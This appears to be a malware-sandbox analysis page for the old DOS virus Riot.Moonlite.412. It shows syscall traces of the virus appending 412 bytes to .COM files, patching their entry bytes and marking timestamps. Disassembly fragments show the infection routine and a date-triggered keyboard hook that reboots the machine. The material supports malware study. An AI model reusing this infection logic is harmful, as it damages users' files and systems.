Sample viewer

vx.netlux.org/Virus.DOS.Riot.Moonlite.412

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:12:58.357573959Z 26 PC: 12ae4 | Set disk transfer address
2018-12-17T23:12:58.359091181Z 78 PC: 12aef | Find first file
2018-12-17T23:12:58.36712373Z 67 PC: 12b10 | Get or set file attributes
2018-12-17T23:12:58.383873362Z 61 PC: 12b19 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:12:58.391618529Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:58.400018374Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:12:58.401525388Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
0x12b40: call 0x22aad
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-17T23:12:58.404081988Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-17T23:12:58.414187441Z 66 PC: 12b4b | Move file pointer
2018-12-17T23:12:58.415696917Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:58.42316776Z 87 PC: 12b69 | Get or set file date and time
2018-12-17T23:12:58.425422496Z 62 PC: 12b6d | Close file
2018-12-17T23:12:58.435331079Z 67 PC: 12b7c | Get or set file attributes
2018-12-17T23:12:58.446379356Z 79 PC: 12aef | Find next file
2018-12-17T23:12:58.449397549Z 67 PC: 12b10 | Get or set file attributes
2018-12-17T23:12:58.460735645Z 61 PC: 12b19 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:12:58.468596366Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:58.475896453Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:12:58.478009069Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
0x12b40: call 0x22aad
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-17T23:12:58.480683985Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-17T23:12:58.484251426Z 66 PC: 12b4b | Move file pointer
2018-12-17T23:12:58.486835855Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:58.48997668Z 87 PC: 12b69 | Get or set file date and time
2018-12-17T23:12:58.492261288Z 62 PC: 12b6d | Close file
2018-12-17T23:12:58.503077971Z 67 PC: 12b7c | Get or set file attributes
2018-12-17T23:12:58.514424562Z 79 PC: 12aef | Find next file
2018-12-17T23:12:58.517935071Z 67 PC: 12b10 | Get or set file attributes
2018-12-17T23:12:58.529878515Z 61 PC: 12b19 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:12:58.537679349Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:58.5494038Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:12:58.551364175Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
0x12b40: call 0x22aad
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-17T23:12:58.555108891Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-17T23:12:58.559163582Z 66 PC: 12b4b | Move file pointer
2018-12-17T23:12:58.561504443Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:58.566025853Z 87 PC: 12b69 | Get or set file date and time
2018-12-17T23:12:58.569249085Z 62 PC: 12b6d | Close file
2018-12-17T23:12:58.584241129Z 67 PC: 12b7c | Get or set file attributes
2018-12-17T23:12:58.596247899Z 79 PC: 12aef | Find next file
2018-12-17T23:12:58.599445035Z 67 PC: 12b10 | Get or set file attributes
2018-12-17T23:12:58.610466967Z 61 PC: 12b19 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:12:58.618762557Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:58.626050686Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:12:58.627737075Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
0x12b40: call 0x22aad
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-17T23:12:58.630627239Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-17T23:12:58.634082134Z 66 PC: 12b4b | Move file pointer
2018-12-17T23:12:58.636603347Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:58.640812385Z 87 PC: 12b69 | Get or set file date and time
2018-12-17T23:12:58.644119283Z 62 PC: 12b6d | Close file
2018-12-17T23:12:58.653285038Z 67 PC: 12b7c | Get or set file attributes
2018-12-17T23:12:58.66428131Z 79 PC: 12aef | Find next file
2018-12-17T23:12:58.668498295Z 67 PC: 12b10 | Get or set file attributes
2018-12-17T23:12:58.679544422Z 61 PC: 12b19 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:12:58.687170666Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:58.695026562Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:12:58.696662543Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
0x12b40: call 0x22aad
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-17T23:12:58.699294736Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-17T23:12:58.703337825Z 66 PC: 12b4b | Move file pointer
2018-12-17T23:12:58.706418349Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:58.709738977Z 87 PC: 12b69 | Get or set file date and time
2018-12-17T23:12:58.712591744Z 62 PC: 12b6d | Close file
2018-12-17T23:12:58.720777056Z 67 PC: 12b7c | Get or set file attributes
2018-12-17T23:12:58.727300143Z 79 PC: 12aef | Find next file
2018-12-17T23:12:58.729335426Z 67 PC: 12b10 | Get or set file attributes
2018-12-17T23:12:58.737796577Z 61 PC: 12b19 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:12:58.743125951Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:58.750854686Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:12:58.753041556Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
0x12b40: call 0x22aad
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-17T23:12:58.766781144Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-17T23:12:58.776505903Z 66 PC: 12b4b | Move file pointer
2018-12-17T23:12:58.779114568Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:58.786654651Z 87 PC: 12b69 | Get or set file date and time
2018-12-17T23:12:58.788864552Z 62 PC: 12b6d | Close file
2018-12-17T23:12:58.798554698Z 67 PC: 12b7c | Get or set file attributes
2018-12-17T23:12:58.810088922Z 79 PC: 12aef | Find next file
2018-12-17T23:12:58.813507551Z 67 PC: 12b10 | Get or set file attributes
2018-12-17T23:12:58.825984156Z 61 PC: 12b19 | Open file (Filename = 'PAH.COM')
2018-12-17T23:12:58.834241832Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:58.84231267Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:12:58.845296414Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
0x12b40: call 0x22aad
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-17T23:12:58.848790658Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-17T23:12:58.852463371Z 66 PC: 12b4b | Move file pointer
2018-12-17T23:12:58.854739706Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:58.858310034Z 87 PC: 12b69 | Get or set file date and time
2018-12-17T23:12:58.86001916Z 62 PC: 12b6d | Close file
2018-12-17T23:12:58.868550533Z 67 PC: 12b7c | Get or set file attributes
2018-12-17T23:12:58.880229249Z 79 PC: 12aef | Find next file
2018-12-17T23:12:58.883244473Z 67 PC: 12b10 | Get or set file attributes
2018-12-17T23:12:58.894070375Z 61 PC: 12b19 | Open file (Filename = 'TEST.COM')
2018-12-17T23:12:58.929950972Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-17T23:12:58.933041305Z 66 PC: 12b2d | Move file pointer
2018-12-17T23:12:58.934896485Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
0x12b40: call 0x22aad
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-17T23:12:58.937797937Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-17T23:12:58.940949227Z 66 PC: 12b4b | Move file pointer
2018-12-17T23:12:58.942385743Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-17T23:12:58.945440114Z 87 PC: 12b69 | Get or set file date and time
2018-12-17T23:12:58.947066126Z 62 PC: 12b6d | Close file
2018-12-17T23:12:58.953426829Z 67 PC: 12b7c | Get or set file attributes
2018-12-17T23:12:58.961037665Z 79 PC: 12aef | Find next file
2018-12-17T23:12:58.963149873Z 42 PC: 12b82 | Get date 0x12b82: cmp dl, 1
0x12b85: je 0x12b8a
0x12b87: jmp 0x12bf0
0x12b89: nop
0x12b8a: mov ah, 9
0x12b8c: int 0x21
0x12b8e: jmp 0x12bbd
0x12b90: nop
0x12b91: push ax
0x12b92: in al, 0x60
0x12b94: cmp al, 0x53
0x12b96: nop
0x12b97: nop
0x12b98: je 0x12ba0
0x12b9a: pop ax
0x12b9b: ljmp ptr cs:[0x29f]
0x12ba0: ljmp 0xffff:0
0x12ba5: iret
0x12ba6: cmp ax, 0x4b00
0x12ba9: jne 0x12baf
2018-12-17T23:12:58.964928874Z 26 PC: 12bfa | Set disk transfer address
2018-12-17T23:12:58.966804474Z 9 PC: 12a82 | Display string (String= 'Goat file (COM). Size=00000064h/0000000100d bytes. ')
2018-12-17T23:12:58.969471005Z 76 PC: 12a86 | Terminate with return code (Return code = '36')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17691,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:56:22.288146144Z 26 PC: 12ae4 | Set disk transfer address
2018-12-25T12:56:22.289248481Z 78 PC: 12aef | Find first file
2018-12-25T12:56:22.294894474Z 67 PC: 12b10 | Get or set file attributes
2018-12-25T12:56:22.310311641Z 61 PC: 12b19 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:56:22.314982342Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:56:22.318928759Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:56:22.319856567Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
0x12b40: call 0x22aad
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-25T12:56:22.322103048Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-25T12:56:22.327914033Z 66 PC: 12b4b | Move file pointer
2018-12-25T12:56:22.32968509Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:56:22.335328383Z 87 PC: 12b69 | Get or set file date and time
2018-12-25T12:56:22.33665724Z 62 PC: 12b6d | Close file
2018-12-25T12:56:22.342080461Z 67 PC: 12b7c | Get or set file attributes
2018-12-25T12:56:22.350998799Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.353286059Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.362043899Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.366412376Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.373189761Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.374487836Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.377475968Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.379884349Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.380938321Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.383375659Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.385744414Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.391108436Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.400733006Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.403643713Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.413041727Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.424425631Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.431840306Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.433289303Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.435574189Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.438819493Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.440219506Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.442725644Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.444402065Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.451471304Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.461001787Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.46399865Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.473657673Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.480164155Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.487330031Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.488693443Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.491495433Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.494962742Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.496585319Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.499162848Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.501222763Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.508998065Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.518742169Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.521814961Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.531931229Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.538322499Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.544800923Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.546098638Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.548262058Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.551381472Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.55287955Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.555401307Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.558252591Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.565345879Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.57518337Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.577254325Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.584274895Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.588574252Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.596094205Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.597539963Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.599761019Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.607533558Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.608961576Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.614299947Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.616584156Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.625300156Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.634985219Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.638131824Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.647970167Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.654685706Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.661076333Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.662645288Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.664789201Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.667857259Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.669209448Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.671867415Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.674597196Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.682050035Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.694473017Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.697096329Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.706768115Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.71311254Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.719494512Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.721070515Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.723497781Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.728246859Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.729999226Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.732771107Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.73428915Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.741879085Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.751431649Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.754543207Z 42 PC: 12b82 | Get date 0x12b82: cmp dl, 1
0x12b85: je 0x12b8a
0x12b87: jmp 0x12bf0
0x12b89: nop
0x12b8a: mov ah, 9
0x12b8c: int 0x21
0x12b8e: jmp 0x12bbd
0x12b90: nop
0x12b91: push ax
0x12b92: in al, 0x60
0x12b94: cmp al, 0x53
0x12b96: nop
0x12b97: nop
0x12b98: je 0x12ba0
0x12b9a: pop ax
0x12b9b: ljmp ptr cs:[0x29f]
0x12ba0: ljmp 0xffff:0
0x12ba5: iret
0x12ba6: cmp ax, 0x4b00
0x12ba9: jne 0x12baf
2018-12-25T12:56:22.756731266Z 9 PC: 12b8e | Display string (String= '�5Goat file (COM). Size=00000064h/0000000100d bytes. ')
2018-12-25T12:56:22.761865687Z 53 PC: 12bc2 | Get interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:56:22.763010878Z 37 PC: 12bd4 | Set interrupt vector (Interrupt = '9' AKA 'Display string')
2018-12-25T12:56:22.764336177Z 53 PC: 12bd9 | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:56:22.765407742Z 49 PC: 12bf0 | Terminate and stay resident (Return code = '0' | Memory size = '31')

{"DateBased":true,"Day":2,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":17691,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:56:22.320084269Z 26 PC: 12ae4 | Set disk transfer address
2018-12-25T12:56:22.321906707Z 78 PC: 12aef | Find first file
2018-12-25T12:56:22.328496229Z 67 PC: 12b10 | Get or set file attributes
2018-12-25T12:56:22.346397711Z 61 PC: 12b19 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:56:22.354141243Z 63 PC: 12b25 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:56:22.361635908Z 66 PC: 12b2d | Move file pointer
2018-12-25T12:56:22.363397593Z 44 PC: 12b3c | Get time 0x12b3c: mov word ptr [bp + 0x11e], dx
0x12b40: call 0x22aad
0x12b43: cdq
0x12b44: sub cx, cx
0x12b46: mov ax, 0x4200
0x12b49: int 0x21
0x12b4b: lea dx, word ptr [bp + 0x29c]
0x12b4f: mov cx, 3
0x12b52: mov ah, 0x40
0x12b54: int 0x21
0x12b56: mov dx, word ptr [bp + 0x2bf]
0x12b5a: mov cx, word ptr [bp + 0x2bd]
0x12b5e: and cl, 0xe0
0x12b61: or cl, 0x15
0x12b64: mov ax, 0x5701
0x12b67: int 0x21
0x12b69: mov ah, 0x3e
0x12b6b: int 0x21
0x12b6d: lea dx, word ptr [bp + 0x2c5]
0x12b71: sub cx, cx
2018-12-25T12:56:22.366123637Z 64 PC: 12abb | Write file or device (Write 412 bytes on handle 5)
2018-12-25T12:56:22.375789677Z 66 PC: 12b4b | Move file pointer
2018-12-25T12:56:22.377480573Z 64 PC: 12b56 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:56:22.384885237Z 87 PC: 12b69 | Get or set file date and time
2018-12-25T12:56:22.388190486Z 62 PC: 12b6d | Close file
2018-12-25T12:56:22.397225305Z 67 PC: 12b7c | Get or set file attributes
2018-12-25T12:56:22.408324733Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.411793086Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.423009575Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.430465519Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.439210235Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.441467801Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.44413835Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.447307286Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.449154199Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.452049776Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.453787614Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.462487257Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.473692383Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.476886243Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.488177267Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.496134276Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.50398314Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.506759488Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.509651898Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.512990946Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.515883539Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.519770423Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.521693773Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.532550776Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.543791735Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.546988766Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.55812443Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.566783413Z 63 PC: 12b25 | Read file or device (See above)
2018-12-25T12:56:22.574772311Z 66 PC: 12b2d | Move file pointer (See above)
2018-12-25T12:56:22.576735372Z 44 PC: 12b3c | Get time (See above)
2018-12-25T12:56:22.580742036Z 64 PC: 12abb | Write file or device (See above)
2018-12-25T12:56:22.584132508Z 66 PC: 12b4b | Move file pointer (See above)
2018-12-25T12:56:22.58574115Z 64 PC: 12b56 | Write file or device (See above)
2018-12-25T12:56:22.589727262Z 87 PC: 12b69 | Get or set file date and time (See above)
2018-12-25T12:56:22.591892486Z 62 PC: 12b6d | Close file (See above)
2018-12-25T12:56:22.600349072Z 67 PC: 12b7c | Get or set file attributes (See above)
2018-12-25T12:56:22.612277685Z 79 PC: 12aef | Find next file (See above)
2018-12-25T12:56:22.615651045Z 67 PC: 12b10 | Get or set file attributes (See above)
2018-12-25T12:56:22.626616971Z 61 PC: 12b19 | Open file (See above)
2018-12-25T12:56:22.634148538Z 63 PC: 12b25 | Read file or device (See above)
